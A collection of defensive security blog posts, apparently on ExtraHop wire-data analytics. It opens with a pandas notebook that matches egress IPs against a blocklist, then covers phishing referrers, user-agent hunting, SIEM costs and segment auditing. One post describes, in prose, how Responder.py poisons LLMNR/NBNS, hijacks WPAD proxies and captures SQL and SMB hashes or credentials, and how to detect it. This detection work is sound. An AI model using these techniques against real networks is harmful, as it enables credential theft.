This Jupyter notebook is available at https://github.com/donadatum/Python_Projects

This notebook demonstrates a simple way to see if egress (outbound) transactions from wire data traffic are terminating a potential malicious sites. The Python software library pandas is used to compare the IP addresses of servers exfiltrating from a mock set of IP addresses from businesses against IP addresses of malicious sites.

To represent ‘known bad actors’, this example uses IP addresses that have been reported within the last 48 hours as having run attacks on the service Mail, Postfix at the Blocklist website: https://lists.blocklist.de/lists/mail.txt, downloaded Jan 9, 2018.

We can plot the distribution, by using the .plot() method and specifying a horizontal bar chart. However in this example it is not is very useful because of the very high frequency of US IP addresses compared with other countries.

In [18]:

egress['Dest Country'].value_counts().plot(kind='barh')

Out[18]:

<matplotlib.axes._subplots.AxesSubplot at 0x118517780>

What if we wanted to look at the traffic from a particular country, such as France? We could use indexing combined with the the pandas .isin() method. This is similar to the SQL LIKE operator. The produces a new dataframe ‘France’.

In [48]:

France=(egress.loc[egress['Dest Country'].isin(['France'])])

In [49]:

France.head(2)

Out[49]:

Time

Record Type

Source

Destination

Source Location

Dest Location

Environment

Dest Country

Protocol

Client Address

Client Bytes

Server Address

Server Bytes

Latency

Process Time

1784

50:13.4

Flow Audit

Santa Clara Campus (Users)

External

Santa Clara Office

Ì_le-de-France

EGRESS

France

SSL:443

192.168.0.99

126

74.121.138.36

258

NaN

57.071

1787

50:13.3

Flow Audit

Santa Clara Campus (Users)

External

Santa Clara Office

Ì_le-de-France

EGRESS

France

SSL:443

192.168.0.99

517

74.121.138.36

2,916

60.99

76.425

In [50]:

type(France)

Out[50]:

pandas.core.frame.DataFrame

Using the describe method we can see that there are 13 transactions – this is the same number identified using .value_count() above. All of these transactions are from the Santa Clara Campus, the most frequent destination is Ale-de-France and 188.165.39.118 is the most common server address.

The file ‘badips.csv’ contains a list of malicious IP addresses from the Blocklist website. We use pd.read_csv to bring the data into a pandas dataframe. We specify that there is no header and assign the column name ‘Server Address’ to our 1 column dataframe.

Lets add some fake data (like fake news but better!) into our blocklist to make sure the join is working. I have taken 10 IP addresses from the ‘egress’ data frame and created a file ‘fakebadservers.csv’. After loading this file using pd.read_csv I concatonated this dataframe to ‘blocklist’ to create ‘fakeblocklist’.

Lets try the merge again, only this time using ‘egress’ and ‘fakeblocklist’. This merge identifies 580 transactions associated with a known ‘bad actor’ – that is the Server Address in egress matches the server address in ‘fakeblocklist’.

I was reading the Cisco mid-year security review and once again, phishing is still staggeringly effective. One of the strategies in looking for possible phishing campaigns is investigating HTTP referrer metrics in log files. This is not a bad way to look for phishing campaigns but I wanted to take the time to cover a log-alternative to investigating phishing attacks using ExtraHop’s Wire Data analytics.

Why wire data?I recently read a whitepaper by Solarwinds stating that a typical peak events-per-second rate on a web farm is around 1100. Cast this across 6-8 business hours a day and you are looking at paying to store and index between 24 million and 32 million events of which a fraction of that is relevant to searching relevant referrals. While I love logs and the use of them, the intelligence yield of most log solutions can be measured in the “thousandths” of a percent. In this post, I am going to walk though how to look for specific referrers that do not match what you expect to see and provide ONLY the actionable HTTP referrers that could be the result of phishing campaigns.

What do we want to do?We have a site called demo.example.com that logs users into our fictitious financial site. All users should be sent to a welcome page called demo.extrahop.com:8080 (yes, this is simplistic). We can either hash that HTTP referer or referer(s) and look specifically for referers that do NOT match or we can look for them specifically. You may find that if you have a large number of HTTP referer sites it looks MUCH cleaner to use hashes. For this example we want to look for two things.

Any HTTP referer that DOES NOT match the goodRefer array

Any “double-dotted” namespace that exists in the domArray array. (You may also want to check for “appended” or “double-dotted” namespace on line 7 as well in case you think internal users may get phished and you want to catch it on the EGRESS.)

Okay, we have some unauthorized HTTP referers, we have verified that they are a phishing site now what do we do?You have several options should you observe unauthorized HTTP referers those that I can think of initially are as follows:

If this is an external customer, you can log the credentials on the site and begin the process of alerting them.

Build in a redirect policy sending users sourcing from the offending referer to a page that alerts them that they have been phished.

Send the data to your poor-overburdened SIEM with some high INTEL-yield actionable logs!!

JSON.stringify the results and send them to the FS-ISAC and alert the rest of the community (and punk-bust the offenders that much faster!)

Below we are writing the data to our search appliance with a once-click link directly to the packets for digital evidence and further investigation (Click Image)

Conclusion:Phishing is still an effective vector for bad actors today and less friction we can put between the practitioner and the data that they need the better. Leveraging wire-data for this task is considerably more-agile than log based solutions and it delivers better data to your existing SIEM investment. Having an open platform like ExtraHop makes integrating incident response, system owners, end users and customers as well as the security community at large more integrated into the solution. We have had stand-alone security for a long time, in some situations that is as good as it gets but where we can, I believe we should leverage the entire community. It is the gaps between us (users, customers, system owners and security) that is exploited as much as any vuln.

The threat hunting discipline continues to evolve in the security industry as organizations seek to become more proactive at finding threats to their infrastructure and engaging in what his fast becoming a “hand-to-hand” combat situation in IT security. At the time of this article there where over 7100 job postings on linked in with the terms “Threat Hunting” or “Threat Intelligence”. The deluge of data that we have undertaken in the last ten years has resulted in significant noise and difficulty finding context within the myriad of disparate data sources that exist in an enterprise. In this post, I want to discuss how we can “cut out the middle-man” in our “quest for context” gaining much needed agility, speed and making our investments in mash-up technologies such as SIEMs, big data lakes and innovations like Sqrrl more efficient and less work.

The case for wire data:I tend to over use the title above but I think there is a significant case for leveraging wire data to gain context. In the case of this specific hunt, I am going to search specifically for non-standard user agents that I note on my network. UA hunting is relatively common and while most hackers worth their salt will change the user agent name to hide there is still a large number of solutions that do not, specifically IoT devices, of which millions will be purchased in the next few weeks that could be arbitrarily connected to your networks. The case for using wire data here is that, YES, you can log user agent in your web logs and parse them out, write them to SIEM or database then query them to find those user agents that you consider to be actionable. This is the “Middle Man” I am trying to eliminate. You may need to collect several terabytes of logs that need to be indexed (not always free) and stored (not always fast). Leveraging the ExtraHop wire data analytics platform, we are parsing non-standard User-Agents directly off the wire (no “middle-man”) and bring context to the surface within milliseconds. This data can now be send to your back end SIEM, data lake or Sqrrl instance delivering a much higher (term I like to use) “intelligence yield” as, in addition to populating dashboards, integrating with orchestration API’s and creating alerts and emails, you line your threat intelligence coffers with BETTER DATA! Better SIEM, better data-lake, better back end systems.

Below is a dashboard created specifically for the UA Hunt inspired by the threat hunting project that includes the following metrics:

Total number of unique user-agents per host (If your server has 7 unique user agents…it might have some malware or unauthorized software on it)

Unique IPs by non-standard User Agent.

Python and PowerShell user-agents (POSH is rapidly becoming the weapon of choice for a number of bad actors, if they use it to phone home….BUSTED!)

Geo-coded INGRESS and EGRESS (Example: if you don’t do business with Belarus, maybe you should look into the POSH user agent connected to it…)

Click Image

Drilling Down:You can also drill down into the specific conversations that were observed to get an idea of the client/server involved in the conversation as well as the request/response bytes (how big a file was sent) and URI.

Click Image

Clicking the bull’s eye on the left will take you to the packets that can then be downloaded and analyzed as well.

Click Image

Conclusion:The “Data problem” is a big one, solving it requires re-thinking how/where we do analytics. Back end SIEMs and data lakes are in desperate need of better data while not everything will send Syslog messages or Netflow data the common thread in all of the devices we are trying to secure is wire data. If it has an IP address, we can monitor it and log it. Threading wire data analytics into your security strategy will add significant agility, shutter speed and a higher intelligence yield making your entire security practice more effective. This is just one example of threat hunting with Wire Data and ExtraHop. Future posts will include the following hunts:

Detecting lateral movement via Explicit Credentials

Beacon Detection

Dynamic DNS

URI Analysis

Command and Control Detection

PSEXEC

External RDP

Webshells

Rogue Listeners

Threat hunting with wire data brings an entirely new data source to threat hunters and practitioners. Leveraging ExtraHop’s open solution that includes integration with REST API’s will make solving the “data problem” much easier and save you the time, cost and effort of parsing through terabytes and even petabytes of data to gain context.

I was listening to the Security Weekly podcast this week with Paul Asadoorian and John Strand and I heard them talking about a product called Mazerunner that can detect responder.py running on your network. I began to wonder if there was a way to detect responder.py using the ExtraHop platform. So I downloaded a Kali OVA file and started looking into what the traffic looked like on the wire to see if I could make some sense of it. What I found was that I was, in fact, able to consistently detect Responder.py traffic by looking at LLMNR responder packet itself coming from the Kali server.

What I observed:Over the last four years, I have literally spent my time pulling metadata and PCAPs at the core router or via some sort of Span aggretation like Gigimon or Arista. I can honestly say, in the realm of protocols that I come across LLMNR (udp 5355) is not one I come across very often. It is possible this is due to the request normally being sent out to a broadcast address (rarely the focus of my work) but seeing a response from an RFC1918 address was somewhat interesting. What I mean is, I would start up responder on my Kali box then see the request to the broadcast address with the response sourcing from the Kali system with its own separate flow. An analogy would be like if you asked a crowd “Where is TypoShare?” and someone, wearing a trench-coat, fedora and sunglasses, said “I got ya’ TypoShare right here….just log in”. On the wire, this is easy to pick out as it does not respond over the ephemeral port rather it creates a new flow so I am able to easily parse it out as the Kali server appears as the sender and the Windows domain workstation appears as the receiver. This alone does NOT make a malicious situation but I want to start the process of gathering internal threat intelligence by keeping track of the system that responded to the LLMNR request.

Below is an example of a user “fat fingering” a share and having the lookup answered by the malicious Kali host (or anyone who basically “git clone” s Responder.py)Note below, you see the Kali system located at 192.168.0.11 answer the LLMNR request and provide name resolution for a file server/share that does not exist. It is not entirely uncommon for a large enterprise for someone to have a typo in a CIFS share name.

Below we see that we have observed someone answering an LLMNR/NBNS request

The next step is to write the system answering LLMNR requests to our session table so that we can look them up later. (cip and sip are variables for Client and Server IP respectively)

ExtraHop IOC protocol threading:

So what exactly is happening here?For this test, I wanted to check a number of IOCs around SQL (TDS), Web Proxying and WPAD MITM hijacking as well as Hash stealing. To research this with logs, you would need to take the time to interrogate several different source log files then try to mash them up. I am trying to do this within seconds and in-flight vs. after they have been written to the SIEM. So to do this, I use the ExtraHop “Session” table which is a memcache key value pair location where I will part the system answering LLMNR queries and see if it shows up again when I match additional IOCs around CIFS, HTTP and TDS. (If that didn’t make sense, feel free to email me).

So the next step is to check for any type of hijacking/Tunneling that could occur as a result of someone running responder.py on your network. First let’s have a look at HTTP Tunneling (WPAD Proxy hijacking).

HTTP WPAD Hijacking and TUNNELING:Responder.py tries to hijack proxy sessions on browsers that are set to auto-discover proxy servers. In this case, I open my browser and the Kali system happily resolves WPAN for me and offers to be my proxy server for my web session, in addition to obtaining my hash it may also prompt me for creds because, hey, clear text is always better than a hash.

How do we catch this?To catch this, we look at the HTTP headers (in real time and at, up to, 40 Gbps) for the host WPAD and if the result is true, we check the server IP against the IP address we put in the session table earlier, if that ALSO comes back true, then we flag it as a potential actionable event. You may actually have a WPAD server in your environment, but I am comfortable in saying that you likely don’t have a WPAD server that had previously been resolving LLMNR and/or NBNS name requests. That makes it suspicious and actionable, the goal here is to give CSIRT and the SOC BETTER data, not more data. Also, keep in mind, all of this is being interrogated in flight so #LookMomNoSIEM!!! We can also send the data to a Syslog/SIEM workflow which would likely be a welcome change to get pre-parsed actionable Intel sent to the SIEM vs. thousands of logs that must be sifted through to find actionable intelligence.

Likewise, with Tunneling we do something similar where we look for the Tunneling protocol consistent with proxy servers and if we see it, we check the server IP against our LLMNR host from earlier (again, “sip” is a variable for Server IP). As I said before, you may have a proxy server but likely not one that speaks LLMNR.

Below you see the results, here we are just logging them to the debug window but we offer a number of ways to deal with IOC discovery that include but are not limited to:

ServiceNow SEVONE ticket creation

Syslog to a SIEM based workflow or orchestration

REST API HTTP.post to a workflow or orchestration solution

Results:

SQL Server Credential Stealing:Responder.py can also listen for SQL Server browser requests, if someone installs SQL Management Studio on their system then proceeds to browse the network for a SQL Server, the Kali system running responder will offer them a system. Most folks would be curious and likely click on it and when they did so, would hand over their hash, likely a developer account that has access to sensitive data, or they will try to offer it SQL credentials and then the Kali server will have their SQL based creds. The first time I saw this I was imagining the horror of someone literally stealing hashes and creds and developers frustratingly offering their creds to it. So to combat this, we will look for the SQL browsing protocol (udp:1434) and if we see it, as before, we will check the server IP against our LLMNR responder that we parked in memcache (Session Table) to see if it matches. The caveat here is that I am not sure if the SQL Browser does not actually use LLMNR natively, I can say that I don’t see it very often when my head is in the packets at customer sites but for my part, I have spent the last 5 years disabling this service on most SQL Servers for security reasons. At any rate, we can detect it with regularity and many best practices advise disabling the SQL Browser service anyway so if it shows up on your network with anything other than a broadcast address it could be an issue.

Below you see the trigger logic were we check for the presence of the SQL Browsing traffic then we check it against the IP we put in the session table.

Results:If we see a match, here we are warning inside the debug window but in an implementation this would be sent to the SIEM, ServiceNow, an Email alert or some form of orchestration to initiate an incident response.

Watching CIFS to see if hashes are being stolen:The last thing I want to show in this post is how to detect if someone tries to steal a hash using CIFS. (This can also be done using WPAD but I will cover that in a later post).

Observations:If an end user inadvertently types the wrong share name into a browser, either via explorer or the “net use” command the normal name resolution will fail causing the system to broadcast the request. The Responder.py system will answer this request via NBT-NS or LLMNR and offer the user to type credentials (see graphic below). What I noticed on the wire is that there is a CIFS message for “SMB2_SESSION_SETUP: STATUS_ACCESS_DENIED” even though there wasn’t an official request thus you see the access denied message in the CIFS dialog box for the share \\1233\.

Casting the web:So in preparing the trigger for this, I simply look for the error string then, as we have seen previously, cross-checked the IP address against those that have responded to LLMNR requests. In the event of a match, we are writing it out to the debug window but depending on the customer we would run the normal Incident Response regimen.

Results:

Conclusion:It had been a long time since I had used any PEN testing tools. One thing I have to say, after 20 years of being a blue-teamer, is DAMN, the red team’s toys are SO MUCH cooler than ours!! This is not an attempt to one up Security weekly or Mazerunner, it was an interesting use case that I had not tried to tackle before with the platform and it made for an interesting weekend project. If you are curious, this took a few hours to write once I got all of the systems in place (AD lab, Kali system). While we will write all of the code that we include with our specific security bundles, this is an example of how we have an open platform that, if desired, you can engage in your own version of hand-to-hand combat with IOCs and bad actors. In this example, we have not had to set up any honey-pots or misdirection, there are products that already do that. We are simply looking at the existing traffic and parsing out behavior that is indicative of an IOC. One of the challenges of doing this with logs or machine data is that if an IOC uses more than one protocol than you likely have disparate logs/PCAPs for each protocol and researching each data source is not agile at all. Using the Session table, we are able to park specific characteristics to be referenced in real time (in Microseconds) and reused with other transactions threading them together to create a picture within seconds, this is the true power being handed back to the blue team using our platform. With ExtraHop’s application inspection triggers you have the ability to engage directly with the wire to root out IOCs like LLMNR responses, SQL Browsers, SMBv1, expired/weak certificates, etc. This gives you the same agility that your adversaries have allowing you to pivot your surveillance to what is relevant for your environment. Lastly, 192.168.0.11 (or any other RFC1918 address) will NEVER be in your TAXII/STIXX feed or Threat Intelligence subscription. Leveraging a surveillance platform like ExtraHop will position you to be able to gather and build your own internal threat intelligence on your internal addresses. As most breaches being/source from the inside, the ability to create internal intelligence is critical.

I recently attended Black Hat and one of the key narratives that I overheard while meeting with INFOSEC practitioners was the need to have better/smarter data. Attendees voiced some frustration with current traditional tools that are delivering too much data and the time it takes to respond to an incident leaves attackers enough time to do their dirty work. Over the last year we have heard several criticisms of SIEM based solutions and some of the limitations that they have in dealing with today’s more agile threat landscape. My induction into security was based in SIEM and I even ran a blog dedicated to Syslogs at http://Xen-trifuge.com where I detailed work I had done around my “Skunk” project. It stemmed from my desperate, but unheeded, pleas to my former manager to purchase Splunk saying “Can I have $20,000?” and being told “No” then seeing Kiwi Syslog support SQL Server connections and I then made a second plea, “Can I have $300 dollars?” which was accepted. SKUNK stood for SQL, KIWI to make it like Splunk. We used SQL, SSRS and KIWI’s ODBC connector with some parsing engines. As SIEM products go, Splunk was ABSOLUTELY my first love! I still know a few brilliant engineers that work there and I have a great deal of respect for what that company has done to revolutionize security.

Over the last 5 years I had another epiphany, I was introduced by an SE named Matt Cauthorn to the concept of Wire Data Analytics. So why am talking about a SIEM on a wire data analytics blog? Well, first, I feel like a lot of the criticism of SIEM’s aren’t necessarily 100% fair. My experience with the SIEM is that it is only as good as the data you put into it. Even more importantly, the investment you make in back-end processes in terms of how you parse, interpret and report with back end processes so that you can “set context”. By “set context” I mean find actionable data which is the subject of some intense criticisms of SIEM products today.

In an article from Dark Reading citing a Ponemon institute study:

Today, those same products “barely work at all,” says Exabeam CMO Rick Caccia. Older systems aren’t built to capture credential or identity-based threats, hackers impersonating people on corporate networks, or rogue employees trying to steal data. A recent report by the Ponemon Institute, commissioned by Cyphort, discovered 76% of SIEM users across 559 businesses view SIEM as a strategically important security tool. However, only 48% were satisfied with the actionable intelligence their SIEMs generate.

With that I’d like to start writing about how Wire Data Analytics with ExtraHop can set context in flight, reduce the cost of your SIEM investment and bring to bear an entirely new set of metrics and provide security teams with better data instead of more data.

Setting Context in Flight: ExtraHop’s wire data analytics capabilities enable you to set context in flight by interrogating the wire for specific events then applying logic to them in milliseconds so that your logs have considerably more value and a much higher intelligence yield.

Example: Auditing your PCI Environment.You have a PCI environment that you want to set up network based auditing for. The rules are as follows:

Alert on ANY external non-RFC1918 access and report it as an Egress Violation

Alert on any client or server based traffic that has not been pre-defined.

Using the SIEM only approach you must perform the following:

– Audit/Log every single build-up and tear-down action which could result in thousands and potentially millions of logs via Syslog or Netflow
– Index, parsed these logs
– Build/run back end batch processes to root out the few suspect transactions from the, potentially, millions of logs that you already have.

Now let’s consider what that would look like using an ExtraHop appliance.
– Create a rule that sets the appropriate communications
– Acceptable client/server traffic (Fill out the pre-defined application inspection trigger with the appropriate protocols)
– Tell the ExtraHop appliance to alert on any non-RFC1918 connection.
– Send ONLY actionable intelligence to the SIEM relieving both the CSIRT team and the back-end SIEM of the burden of indexing/parsing and sorting millions of logs.

Click Image:

After setting the criteria, aka “casting the web” we need only lie in wait for something to run across it. In the video below you will see examples of how we have integrated with Splunk Cloud to “set context in flight” by sending ONLY logs that have violated the criteria cast in the application inspection trigger above.

Now instead of leaving the Threat hunter to sort through thousands or millions of logs on the back end we are sending data that is actionable because we set the rules prior to sending the Syslog message. As you can see below in the Splunk Cloud instance, every transaction sent to the SIEM is actionable vs. the madness of sending thousands and thousands of logs every second to your SIEM. This will make the bill for indexing much cheaper both from a licensing standpoint as well as a hardware scaling standpoint. (Please Watch the Video on Youtube)

New Concept: Intelligence Yield
In my time as the Event Correlation guru for my security team one of the more frustrating things I would run into is the fact that I consistently needed about 30% of what was in a log file but I would pay to store and/or index 100% of the data. When you use ExtraHop as a forwarder you have the ability to actually pick and choose what parts of a log/payload you want to forward and you can even customize the delimiter if you like. This means that there is no leftover ASCII that needs to be stored/indexed. While this may not seem like a lot, at scale it can actually get expensive! Another way we provide better intelligence yield is, as you noted in the example above, we set the conditions under which we would like to send Syslog data and ignore transactions that you may already be logging via whatever daemon you are running (apache for HTTP, etc). Why log HTTP network connections when you are already doing it in /var/log/apache/.

Possible Licensing Cost Savings:We actually had a scenario with a customer where they wanted to find out if there were excessive logins from a single client. The traffic was sending thousands of messages per minute to their SIEM. We looked what was happening and we did the following:

Kept a running ticker of the number of logins per client IP

Sent actionable data to the SIEM by sending just those client IPs that had more than 5 logins in a ten minute period reducing the message count from thousands per minute to between 5-7.

In the fictitious scenario below, we are using Splunk’s list price to show the difference in savings when you use ExtraHop as a forwarder and give the SIEM a break on processing messages. Keep in mind, while this is an overly simple example, there may be parts of your logging regimen that ExtraHop can provide in-flight context as well as a reduction in the amount of work, licensing costs and an increase in the quality of the data you are receiving in your SIEM.

Scenario: Reducing your licensing costs as well as your Mean Time To “WTF!?” (MTTWTF)A customer has 500 clients with each Client node sending around 2500 logs per minute (this is HARDLY out of the ordinary for a large enterprise). So if you have say 500 clients sending 2500 events per minute you are looking at 1.25 million events being indexed every minute.

Let’s say we use the SESSION_EXPIRE event, we are sending ONE event that has the Client:Server and a count of 500, In terms of “Intelligence Yield” it has the same value but it has an overall impact of .04 percent (not four percent, “point zero four” percent). I would argue that the intelligence yield is actually higher because you have delivered a level of context (the count) in the syslog messages vs. leaving it to some algorithm or batch process on the back end to deliver context. Five events….”meh”……500, 5000 events….”WTF!”.

Our “MTTWTF” (Mean Time To “WHAT THE F***….”) is potentially MUCH faster.

So if I take the overly simplistic view of a 50GB Splunk license (it will NOT be this easy for you but I think most customers will get the value prop here)

From Splunk’s Website:

A 50GB Splunk license is $38K Annual or $95K perpetual WITH $19K in support. If we can proportionally reduce the impact of their SIEM product you get the improved “MTTWTF” with a 2GB license which would cost $1500 Annually and $4500 perpetual w/$1500 in maintenance.

As I said earlier, the view here is simplistic but there is WITHOUT QUESTION logging regimens within customers that we can look to make more efficient using ExtraHop’s Wire Data Analytics and the Session table to replace logging every transaction. Also, please credit Splunk for publishing their sticker price.

This is not a knock on Splunk!

In this model you get the following:

On perpetual a 2100% decrease in initial costs

On Annual a 2500% decrease in initial costs

Better Intelligence Yield

No forwarders or debugging levels to enable on the clients themselves.

Keep in mind, the larger the license the smaller the savings will be as Splunk rewards customers for the larger GB license but the point here is, there is significant savings to be made in addition to having all around better logs.

What’s on YOUR wire!!?When you leverage ExtraHop as a log forwarder you actually get access to the best source of data on your network. Not only do you get access to it, but you get application inspection triggers that will allow you to actively interact with it. When you are using ExtraHop, unlike logging based solutions, you are not dependent on someone to “opt-in” to logging. You will NEVER have to go to another team and ask them to install forwarders, agents or send data to a remote system. If you have an IP address, you have already opted-in and if you have an IP address, there is NO opting out. If a system is rooted and /var/log is deleted…we will still log. If logging is shut off on a system, we, like a closed caption TV, will continue surveillance and logging.

No agents, no logs….NO PROBLEM!As previously stated, ExtraHop works from a mirror of the Network so if you have IoT devices that cannot log, we can log it for them. If you have a systems that are “certified” by a vendor and cannot be patched or have forwarders installed on them, not a problem, we can log for them. If you have a malicious raspberry pi plugged into the MDF and have ACL’d yourself off so you cannot be discovered….not a problem, we’ll log everything you do!! (We also send a New Device alert when your mac shows up). What the ExtraHop Discover appliance does is allow you to “log the un-logable” if that makes sense. Adopting a passive, surveillance strategy is a perfect complement to any SIEM regimen.

Conclusion:As I stated near the beginning of the post, INFOSEC teams do NOT need more data, they need better data. I am not saying you no longer need a SIEM but I am absolutely saying that we need to send better data to our SIEM. Using ExtraHop can greatly enhance the agility and certainty of any CSIRT team or SOC. Evaluating transactions BEFORE you send them to the SIEM provides the level of certainty needed to take that next step toward orchestration and automation. As Threat Hunting continues to evolve as a discipline, no one will provide you a more intelligent and scalable web to cast as we move from playing whack-a-mole to a role more consistent with a trap-door spider. Several INFOSEC workflows are currently tied to the SIEM and let’s not throw the baby out with the bathwater. The SIEM can still serve us well, we just need to take steps to send it better data, there is no better source of data than the network and there is no solution more capable of letting you mine data directly off the network than ExtraHop.

One of the more frustrating things about Wannacry, Petya, notPetya is that they would have been made significantly less effective had organizations applied MS17-014. The fact that we still see SMBv1 is utterly staggering to myself and my colleagues. Why is it that we live in a world where we have automation, vulnerability scanning, patching solutions and spend billions on security that our organizations are routinely compromised by what are, in many cases, patchable or at least significantly mitigable. (Admittedly, Petya/NotPetya exploited LSASS.EXE as well which is pretty brutal!)

There is another vector that I think is being exploited and as digital threats become more organized (2017 Cisco ASR states that it is not uncommon for malicious hashes to be less than 24 hours old) is Organizational Air Gaps. While great for protecting integrity and accountability, I believe that organizational “air gaps” are part of the issue and there are numerous instances where security teams have warned system owners about vulnerabilities and were ignored thus the sad attempt at an INFOSEC meme below.

How did we get here? The meme above is meant to lend humor to what is a frustrating situation. I am certain that most system owners do not mock their CISO office nor are they unconcerned about their security. The issue here is that post 9/11 we started to form Cyber security teams. While INFOSEC existing prior to 2001 the size and breadth was not nearly at the level it is today where there are nearly as many INFOSEC roles as IT roles. The point is, we started the process of decoupling system owners from their own security. Cyber security teams started to form and eventually (and probably justifiably) the “Office of the Chief Information Security Officer” (OCISO) was created and, in my opinion, this is where the new risk of organizational air gaps was born. While having the CISO report to the CEO does allow for IT to be held accountable and prevents a CIO from brow-beating the security team from reporting issues with security, it has created a difficult, albeit fixable, organizational challenge where the individuals responsible for addressing reported vulnerabilities have their agenda, budgeting and staffing levels set by an entirely different organization. The security apparatus is tasked with deriving a posture/strategy for an organization and it could easily be received by the IT department as an unfunded mandate. I have worked both in security and within IT departments and throughout my career when I wasn’t working in INFOSEC, the security of the systems under my purview were never a criteria in my performance evaluation. I was very security conscious but it had more to do with not wanting to be in the news or embarrassed. The time has come to evaluate the effect and cause, systems will always have vulnerabilities and vendors will always have patches. The real vulnerability we need to address might be within our own organizations.

How do we fix this? Well, let me start with one of my patented insufferable analogies. The fact that my city has a police department doesn’t mean that I don’t lock my door and that I am not vigilant about my own property. Sadly, the workloads, staff shortages and overall culture of today’s enterprise has system owners worrying about everything BUT security. When I first moved into my neighborhood it was VERY sketchy but I LOVED the old bungalow style houses and my wife and I decided to fix one up. Over the next few years, more people moved into the neighborhood who did not want to tolerate flop houses and crack houses and eventually things got considerably better. Crime went down, property values went up and an area that was very costly to the city was not less costly and paying higher property taxes.

So what changed?As I stated previously, people in my neighborhood made a conscious decision not to allow fringe activity to continue. When we saw people behaving suspiciously, we called the police and generally got involved in the security of our own neighborhoods. Contrast this with a neighborhood 20 blocks south of me where the relationship with law enforcement was strained. This neighborhood was less safe, cost the city more money and had considerably lower property values. I am not going to get into the reasons for the strained relationship with the law enforcement (some legit, some not) but the point/parallel here is that the better your system owner’s relationship is with the CISO’s organization, the more functional and safer your CIDR block is going to be. You have to ask yourself what you have between you and security, a wall, a bridge or a moat with alligators in it. As a federal employee while I did not work for the OCISO my group assigned a daily “pit boss” and we built a bridge between our team and our peers on the OCISO side.

Back in 2010 I made the following statement out of frustration with INFOSEC and the way it was functioning on my Edgesight under the Hood blog. “Unless you can buy your INFOSEC team a crystal ball or get them an enterprise license to Dionne Warwick’s Psychic Friend’s Network system owners are going to HAVE to start taking some responsibility for their own security”. Security teams cannot be responsible for knowing suspect behavior on systems that they don’t oversee on a day to day basis. When we factor in things like phishing or credential stealing then we basically have a bad actor using approved, albeit stolen, credentials coming in over approved ports. If someone had stolen a key to my house and walked up to the front door, opened it and started leaving with my property, even if a cop was standing right there it would not look suspicious. When I chase them out of my house with a Mossberg THAT looks suspicious. Sadly once most systems are compromised, the last people to know are the actual system owners. At ExtraHop we pride ourselves in the visibility we provide both security teams AND system owners. As you evaluate solutions, think of how you can get system owners involved and include IT in the process of implementing them and make them a stake holder.

Conclusion: INFOSEC can be a lonely job, when I worked in IT security, generally the only friends I had in the organization were other security folks. The professional barrier with your IT colleagues is fine but there doesn’t need to be an air gap. In my old neighborhood, yes, the local police there could end up needing to arrest me one day (luckily I have yet to ascend beyond the occasional “suspicious character” in the police blotter) but the professional barrier should not prevent me from working hand and hand with him as he is working to protect me. The people who build, support and architect our digital products pay all of our salaries, including INFOSEC. I think we need to ask ourselves if there are any organizational air-gaps between the CIO and CISO’s organizations and what steps can we take to build bridges to ensure everyone is working together?

Most of the circles I run in are at the point of rolling their eyes when they hear me say “I can’t tell you what the next big breach will be other than that it will involve one host talking to another host it’s not supposed to”. One of the challenges I come across, even in the Federal space occasionally, is that due to staff shortages, the system sprawl facilitated by virtualization and ridicules workloads that some operations teams have, the ability to distill your security posture into who is talking to who is next to impossible. The top two critical controls of the SANS 20 critical controls are An inventory of Authorized and Unauthorized systems as well as an inventory on the Apps and Software running on said systems. In our conversations with practitioners these top two controls are consistently mentioned as being extremely difficult to wrangle. I believe that some of this is due to the top down nature of most security tools that perform tasks like SNMP/Ping sweeps or WMI sweeps. An individual looking to work in the dark will, if they are worth their weight in salt, effectively ACL themselves off and hide from being discovered. The fix for this is wire data analytics which does not depend on discovering data by having open ports or having a system respond. With ExtraHop’s wire data analytics platform if you have an IP address and you engage in a transaction with another host that ALSO has an IP address, you are pretty much made. We will see the port/protocol, IP, client and server of the conversation as well as numerous performance metrics. When this feature is paired with Application inspection triggers, you are then positioned to take back your enterprise and get control of those conversations that you don’t expect or don’t know about. The type of stuff that keeps your CISO up at night.

Enter the ExtraHop Segment Auditing:Using the ExtraHop platform to audit critical segments of your infrastructure has a two-fold function. First, you are positioned to be alerted immediately when an unauthorized protocol or port has been accessed by a client or one of your servers in that segment has engaged in unauthorized traffic to Belarus or China. The second function is to allow Architecture, Security and System owners to reclaim their enterprise by getting a grip on what the exact communication landscape looks like. As previously stated, the combination of staff turnover, system-sprawl and workload have left teams with little to no time to spend auditing communications. With the ExtraHop platform as a fulcrum, much of the heavy lifting is already done drastically reducing the analytics burden.

How it works:Within the ExtraHop platform you create a device group, you then use the Template Trigger to assign to the device group (Example: PCI) and edit a few simple variables that allow you to declare your expected communications. If a transaction that is outside the white list of expected/permitted communications the Discover Appliance will take action in the form of alerts, slack updates, dashboard updates and Explorer (our search appliance) updates. The alerted team will have five minutes to investigate the incident before they will receive another alert. The idea here is you investigate and either white list or suppress transactions that are not allowed/expected. In doing so, you should have a full map of communications within an hour of deploying the trigger to an audited segment/environment.

Declare Expected Communications:In the trigger we have one declared variable and three white lists that can be used to reduced alert fatigue as well as root out unauthorized transactions.

-segment:

Here we set the segment that we are auditing, this is what will show up in the dashboard.-proto_white_list:
Here we set the protocols that are approved for the specific device group we have-cidr_white_list:This variable is used to set the CIDR blocks that you wish to ignore. I generally only use broadcast-type addressing as there are risks with white listing an entire CIDR block.-combo_white_list:For this variable I am using 24 bit blocks from the cidr_port variable. An example of this white list could be the need to alert on CIFS traffic but you want to remove false positives for accessing the sysvol share on your Active Directory controllers. Let’s say your AD environment lives on 10.1.3.0/24 than we would white list “10.1.3.0_CIFS” specifically allowing us to continue to monitor for CIFS while not being alerted on normal Active Directory policy downloads.

Below is a sample of the trigger used that you assign to each device group you would like to audit.

(Click Image)

This same trigger can also be edited to white list client based activity (Egress) as well as server based activity (Ingress).

Results:The results are you can methodically peel the onion back in the event you have a worm infecting your system(s). Additionally, you can systematically begin the process of understanding who is talking to who within your critical infrastructure. Below you see a dashboard that shows the unauthorized activity both as a server and as a client. You also have a ticker showing a count of the offending transactions that includes the client/server/protocol/role as well as a rate of protocol violations. Ideally after a few hours, and working out unexpected communications, you would expect this dashboard to be blank. Beyond the dashboards is where the real money is, let’s talk about some of the potential workflows that are available leveraging the ExtraHop ODS feature and our partners.

(Click Image)

Possible Workflows:

Export results to Excel and ask system owners what the HELL is going on:The ExtraHop platform includes a search appliance that allows you to export the results of the segmentation audit to a spreadsheet. This can be attached to an email to the system owners or CSIRT team to find out what is going on with those unauthorized transactions. In the search grid below, what you see is a mapping of all transactions that were not previously declared as safe.

(FYI, the “Other” protocol is typically tunnel based traffic such as ICMP or GRE)

(Click Image)

